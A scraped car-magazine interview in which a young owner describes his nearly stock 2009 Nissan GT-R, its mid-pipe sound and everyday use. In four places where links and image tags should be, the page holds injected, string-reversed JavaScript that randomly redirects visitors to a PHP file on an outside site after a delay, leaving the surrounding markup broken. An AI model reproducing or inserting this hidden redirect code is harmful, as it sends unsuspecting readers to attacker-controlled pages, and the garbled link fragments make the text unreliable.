Most examples of the GT-R we stumble across in our daily perusing at crankandpiston are destined to have an extra handful of horsepower thrown under the bonnet or be given the carbon fibre treatment, as a quick look at the examples at $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/alpha-logic-dubai-uae-1000hp-is-just-the-beginning/” target=”_blank”>Alpha Logic will attest. Nick though remains adamant that his 2009 model will remain stock, albeit with one slight alteration.

“About 35hp has been added to it as well, so it’s now above 500hp. But the only other modification I’ve had done is to change the mid-pipe, which is quite a common thing to do anyway. The standard sound on the GT-R is very quiet – it sounds a little like a hairdryer! – and the mid-pipe brings out the sound massively without being over the top. That’s one of the best things. It’s got a distinct burble rather like a Subaru Impreza, but a more adult, more powerful version. It sounds amazing!”

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8041.jpg” alt=”” width=”728″ height=”489″ />

Unlike a lot of sub-5s 0-100kph cars, the GT-R is a performance machine Nick can use everyday. Obviously though the temptation to sometimes ‘drive it like he stole it’ is still there (this car has beaten the 911 around the Nordschleife, after all), which can highlight a few small issues.

“I find the acceleration is really smooth. REALLY smooth. In fact, I often think I’m going slower than I actually am. The only way to really know how fast I’m going is to look at the digital readout, which can be a little nerve-wracking! On the highway, I have to set the cruise control: I can be doing 105kph one minute and 135kph the next without even realising I’ve been lightly depressing the accelerator.

“But I also love its flexibility as a day-to-day car. I like being able to use Race mode and turn the traction control off if I’m feeling particularly boisterous or had a stressful day. But it’s also got a couple of backseats so I can fit three of my friends in. I don’t just drive it out like a lunatic, or take it out for a day then lock it up again afterwards. I go and get the shopping in it! I use it everyday.”

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8012.jpg” alt=”” width=”728″ height=”485″ />

One particular facet of the Nissan caught Nick a little by surprise during the first couple of months. Now of course he’s all but immune, though his numerous passengers can sometimes be in for a shock.

“It gets a lot of attention! But you adjust to it. I’ll have people in the car who’ll suddenly say, ‘everyone’s staring’, but I don’t really notice that anymore. I think it’s because the car is…how do I put this?…it’s a people’s favourite, and very popular with lots of different people, but your [exclusive] supercars people may be more wary of.  It’s a driver’s car. It’s not making a big statement, and it’s not trying to be something better.

“A bit like me actually. I’m still pretty young and I don’t want friends and family to categorize me as a person with tons of money who’s forgotten his roots or no longer relates to their lives, because that’s not true. I like to keep it real, and that’ll always be very important to me.”

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/media/2012/08/IMG_8036.jpg” alt=”” width=”728″ height=”485″ />

My last question is a bit of a cop out I’ll admit (“so, are you happy with the GT-R?”), and yet springs up an answer I had not expected.
